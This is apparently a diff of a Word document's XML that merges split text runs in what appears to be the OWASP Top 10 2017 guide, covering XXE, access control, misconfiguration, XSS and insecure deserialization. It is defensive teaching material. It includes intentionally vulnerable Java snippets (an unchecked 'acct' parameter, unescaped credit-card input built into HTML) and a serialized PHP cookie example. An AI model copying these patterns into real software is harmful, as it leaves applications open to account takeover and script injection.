-      <w:r>
-        <w:t>XXE attacks if XML entities are being passed to the SOAP framework.</w:t>
+        <w:t>If your application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7280,10 +6845,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Developer training is essen</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tial to identify and mitigate XXE. Besides that, preventing XXE requires:</w:t>
+        <w:t>Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7319,10 +6881,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Disable XML external entity and DTD processing in all XML parsers in your applica</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tion, as per the </w:t>
+        <w:t xml:space="preserve">Disable XML external entity and DTD processing in all XML parsers in your application, as per the </w:t>
       </w:r>
       <w:hyperlink r:id="rId104">
         <w:r>
@@ -7345,10 +6904,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> hostile data within XML documents, headers, or nodes.</w:t>
+        <w:t>Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7373,10 +6929,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>SAST tools can help detect XXE in source code, although manual code review is the best alternati</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ve in large, complex applications with many integrations.</w:t>
+        <w:t>SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7402,10 +6955,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Numerous public XXE issues hav</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies. The easiest way is to upload a malicious XML file, if accepted:</w:t>
+        <w:t>Numerous public XXE issues have been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies. The easiest way is to upload a malicious XML file, if accepted:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7419,10 +6969,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: The attacker attempts to extract data from</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the server:</w:t>
+        <w:t>: The attacker attempts to extract data from the server:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7483,10 +7030,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: An attacker probes the server's private network by changing the above </w:t>
-      </w:r>
-      <w:r>
-        <w:t>ENTITY line to:</w:t>
+        <w:t>: An attacker probes the server's private network by changing the above ENTITY line to:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7653,13 +7197,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">CWE-611: Improper Restriction of </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>XXE</w:t>
+          <w:t>CWE-611: Improper Restriction of XXE</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -7813,10 +7351,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Exploi</w:t>
-            </w:r>
-            <w:r>
-              <w:t>tability 2</w:t>
+              <w:t>Exploitability 2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7892,10 +7427,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>The technical impac</w:t>
-            </w:r>
-            <w:r>
-              <w:t>t is attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record. The business impact depends on the protection needs of your application and data.</w:t>
+              <w:t>The technical impact is attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7916,10 +7448,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ts of the user. Common access control vulnerabilities include:</w:t>
+        <w:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user. Common access control vulnerabilities include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7967,10 +7496,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Metadata manipulation, su</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ch as replaying or tampering with a JWT access control token or a cookie or hidden field manipulated to elevate privileges, or abusing JWT invalidation</w:t>
+        <w:t>Metadata manipulation, such as replaying or tampering with a JWT access control token or a cookie or hidden field manipulated to elevate privileges, or abusing JWT invalidation</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7994,10 +7520,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Force browsing to authenticated pages as an unauth</w:t>
-      </w:r>
-      <w:r>
-        <w:t>enticated user, or to privileged pages as a standard user or accessing API with missing access controls for POST, PUT and DELETE.</w:t>
+        <w:t>Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or accessing API with missing access controls for POST, PUT and DELETE.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8015,10 +7538,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Access control is only effective if enforced in trusted server-side code or server-less API, where the attacker</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> cannot modify the access control check or metadata.</w:t>
+        <w:t>Access control is only effective if enforced in trusted server-side code or server-less API, where the attacker cannot modify the access control check or metadata.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8054,10 +7574,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Model access controls should enforce record o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>wnership, rather than accepting that the user can create, read, update or delete any record.</w:t>
+        <w:t>Model access controls should enforce record ownership, rather than accepting that the user can create, read, update or delete any record.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8082,10 +7599,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Disable web server directory listing, and ensure file metadata (e.g. .git) and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>backup files are not present within web roots.</w:t>
+        <w:t>Disable web server directory listing, and ensure file metadata (e.g. .git) and backup files are not present within web roots.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8121,10 +7635,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>JWT tokens should be invalidated on</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the server after logout.</w:t>
+        <w:t>JWT tokens should be invalidated on the server after logout.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8171,13 +7682,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>  pstmt.s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t>etString(1, request.ge arameter("acct"));</w:t>
+        <w:t>  pstmt.setString(1, request.ge arameter("acct"));</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -8194,10 +7699,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ccount.</w:t>
+        <w:t>An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8576,29 +8078,20 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Security misconfiguration can happen at any level of an application stack</w:t>
-            </w:r>
-            <w:r>
-              <w:t>, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> or configurations, unnecessary services, legacy options etc.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. The business impact depends on the</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> protection needs of your application and data.</w:t>
+              <w:t>Security misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options etc.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8643,10 +8136,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Unnecessary features are enabled or </w:t>
-      </w:r>
-      <w:r>
-        <w:t>installed (e.g. unnecessary ports, services, pages, accounts, or privileges).</w:t>
+        <w:t>Unnecessary features are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8706,10 +8196,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>The server</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> does not send security headers or directives or are not set to secure values.</w:t>
+        <w:t>The server does not send security headers or directives or are not set to secure values.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8734,10 +8221,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Without a concerted, repeatable application security configuration process, sys</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tems are at a higher risk.</w:t>
+        <w:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8767,10 +8251,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
+        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically, with different credentials used in each environment. This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8782,10 +8263,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>A minimal platform without any unnecessary features</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, components, documentation and samples. Remove or do not install unused features and frameworks.</w:t>
+        <w:t>A minimal platform without any unnecessary features, components, documentation and samples. Remove or do not install unused features and frameworks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8803,13 +8281,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>A9:2017-Usin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>g Components with Known Vulnerabilities</w:t>
+        <w:t>A9:2017-Using Components with Known Vulnerabilities</w:t>
       </w:r>
       <w:r>
         <w:t>).</w:t>
@@ -8837,10 +8309,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Send security directives to clien</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">t agents, e.g. </w:t>
+        <w:t xml:space="preserve">Send security directives to client agents, e.g. </w:t>
       </w:r>
       <w:hyperlink r:id="rId125">
         <w:r>
@@ -8887,10 +8356,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: The application server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server. If one of these apps is the admin console, and default accounts weren't c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hanged the attacker logs in with default passwords and takes over.</w:t>
+        <w:t>: The application server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server. If one of these apps is the admin console, and default accounts weren't changed the attacker logs in with default passwords and takes over.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8904,10 +8370,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories. The attacker finds and downloads your compiled Java classes, which the</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y decompile and reverse engineer to view your code. The attacker then finds a serious access control flaw in your application.</w:t>
+        <w:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to view your code. The attacker then finds a serious access control flaw in your application.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8921,10 +8384,7 @@
         <w:t>Scenario #3</w:t>
       </w:r>
       <w:r>
-        <w:t>: The app server's configuration allows detailed error messages e.g. stack traces to be returned to users. This potent</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.</w:t>
+        <w:t>: The app server's configuration allows detailed error messages e.g. stack traces to be returned to users. This potentially exposes sensitive information or underlying flaws such as component versions that are known to be vulnerable.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8938,10 +8398,7 @@
         <w:t>Scenario #4</w:t>
       </w:r>
       <w:r>
-        <w:t>: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ttacker or malware.</w:t>
+        <w:t>: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9269,26 +8726,20 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications. Automated tools can fi</w:t>
-            </w:r>
-            <w:r>
-              <w:t>nd some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as st</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ealing credentials, sessions, or delivering malware to the victim.</w:t>
+              <w:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications. Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9327,13 +8778,7 @@
         <w:t>Reflected XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: Your application or API includes unvalidated and unescaped user input as part</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious wa</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tering hole websites, advertisements, or similar.</w:t>
+        <w:t>: Your application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9369,10 +8814,7 @@
         <w:t>DOM XSS</w:t>
       </w:r>
       <w:r>
-        <w:t>: JavaScr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ipt frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, your application would not send attacker-controllable data to unsafe JavaScript APIs.</w:t>
+        <w:t>: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, your application would not send attacker-controllable data to unsafe JavaScript APIs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9380,10 +8822,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Typical XSS attacks i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nclude session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.</w:t>
+        <w:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9401,10 +8840,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Pre</w:t>
-      </w:r>
-      <w:r>
-        <w:t>venting XSS requires separation of untrusted data from active browser content. This can be achieved by:</w:t>
+        <w:t>Preventing XSS requires separation of untrusted data from active browser content. This can be achieved by:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9416,10 +8852,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS prot</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ection and appropriately handle the use cases which are not covered.</w:t>
+        <w:t>Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9454,10 +8887,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Applying context sensitive encoding when modifying the browser docum</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ent on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive esca-ping techniques can be applied to browser APIs as described in the OWASP Cheat Sheet 'DOM based XSS Prevention'.</w:t>
+        <w:t>Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive esca-ping techniques can be applied to browser APIs as described in the OWASP Cheat Sheet 'DOM based XSS Prevention'.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9481,10 +8911,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> is a defense-in-depth mitigating control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>raversal overwrites or vulnerable libraries in permitted sources).</w:t>
+        <w:t xml:space="preserve"> is a defense-in-depth mitigating control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path traversal overwrites or vulnerable libraries in permitted sources).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9519,13 +8946,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>(String) page += "&lt;input name='cred</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t>itcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
+        <w:t>(String) page += "&lt;input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'&gt;";</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -9548,10 +8969,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>This attack causes the vic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
+        <w:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9618,13 +9036,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Proactive C</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ontrols: Validate Data</w:t>
+          <w:t>OWASP Proactive Controls: Validate Data</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -9948,10 +9360,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>This issue is included in the To</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">p 10 based on an </w:t>
+              <w:t xml:space="preserve">This issue is included in the Top 10 based on an </w:t>
             </w:r>
             <w:hyperlink r:id="rId149">
               <w:r>
@@ -9962,26 +9371,20 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate </w:t>
-            </w:r>
-            <w:r>
-              <w:t>the problem. It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The impact of deserialization flaws cannot be understated. These flaws can lead to remote code execution attac</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ks, one of the most serious attacks possible. The business impact depends on the protection needs of your application and data.</w:t>
+              <w:t xml:space="preserve"> and not on quantifiable data. Some tools can discover deserialization flaws, but human assistance is frequently needed to validate the problem. It is expected that prevalence data for deserialization flaws will increase as tooling is developed to help identify and address it.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>The impact of deserialization flaws cannot be understated. These flaws can lead to remote code execution attacks, one of the most serious attacks possible. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10002,10 +9405,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplie</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d by an attacker.</w:t>
+        <w:t>Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplied by an attacker.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10025,10 +9425,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that ca</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n change behavior during or after deserialization.</w:t>
+        <w:t>Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10146,10 +9543,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Implement integrity checks such as digital signatures on any seri</w:t>
-      </w:r>
-      <w:r>
-        <w:t>alized objects to prevent hostile object creation or data tampering.</w:t>
+        <w:t>Implement integrity checks such as digital signatures on any serialized objects to prevent hostile object creation or data tampering.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10162,10 +9556,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Enforce strict type constraints during deserialization before object creation as your code typically expects a definable set of classes. Bypasses to this technique have been demonstrated </w:t>
-      </w:r>
-      <w:r>
-        <w:t>so reliance solely on this is not advisable.</w:t>
+        <w:t>Enforce strict type constraints during deserialization before object creation as your code typically expects a definable set of classes. Bypasses to this technique have been demonstrated so reliance solely on this is not advisable.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10189,10 +9580,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hrows exceptions.</w:t>
+        <w:t>Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10240,13 +9628,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: A React application cal</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker notices the "R00" </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</w:t>
+        <w:t>: A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10260,10 +9642,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: A PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and ot</w:t>
-      </w:r>
-      <w:r>
-        <w:t>her state:</w:t>
+        <w:t>: A PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10291,13 +9670,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t>a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t>022f8f3c88bc960";}</w:t>
+        <w:t>a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10350,13 +9723,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OW</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ASP Proactive Controls: Validate All Inputs</w:t>
+          <w:t>OWASP Proactive Controls: Validate All Inputs</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10407,13 +9774,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP AppSecUSA 2017: Friday the 13</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>th JSON Attacks</w:t>
+          <w:t>OWASP AppSecUSA 2017: Friday the 13th JSON Attacks</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -10618,26 +9979,20 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Prevalence of this issue is very widespread. Component-heavy development patte</w:t>
-            </w:r>
-            <w:r>
-              <w:t>rns can lead to development teams not even understanding which components they use in their application or API, much less keeping them up to date. Some scanners such as retire.js help in detection but determining exploitability requires additional effort.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
